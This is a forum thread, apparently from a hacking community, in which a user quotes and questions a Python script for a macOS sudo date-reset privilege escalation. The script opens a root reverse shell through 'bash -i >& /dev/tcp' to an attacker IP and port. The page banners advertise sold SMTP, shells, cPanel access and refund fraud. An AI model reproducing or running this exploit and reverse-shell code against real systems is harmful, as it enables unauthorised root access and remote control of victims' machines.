Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
New Ownership - Policies and Changes Going Forward
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


I will scream at the next person who tells me Macs are secure! filter_list
Author
Message
Adorapuff Away
nobody go im gay
 ***
Registered (Bronze)
Twelve Years of Service
Posts: 2,604
Threads: 207
Reputation: 12
Currency: 336 NSP
TurkeySanta HatDonator (Rank I)Over 9000LovedSuper EliteLegendaryPatronYouTubeHoarderAward WhoreJack-O-LanternPower PosterAgeless
I will scream at the next person who tells me Macs are secure! 10-20-2013, 01:10 AM #13
(10-20-2013, 12:49 AM)3SidedSquare Wrote:
Code:
#!/usr/bin/python
##Various comments##
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
Ok, from python documentation for 3.2.2:
Code:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.
and
Code:
If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None.

If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None.

If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.
So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.
Code:
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
##More various junk###
First, what's with the date? Is it really necessary to -setdate 01:01:1970?
second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help? Sad

Quote:About five months ago, a bug was discovered on using the Date & Time settings within OSX 10.8.4 and below to perform a local privilege escalation from a normal user to root. The original flaw was a bug in Unix and sudo and allows the execution of changing the date and time to escalate to root permissions from a normal user. The flaw was recently put into the Metasploit Framework by Todd Miller (original bug discovery), Joev (wrote the module), and Juan, Vazquez (bug testing and module fixing).
#MakeSinisterlySexyAgain

Reply





Messages In This Thread
I will scream at the next person who tells me Macs are secure! - by Adorapuff - 10-20-2013, 01:10 AM



Users browsing this thread: 6 Guest(s)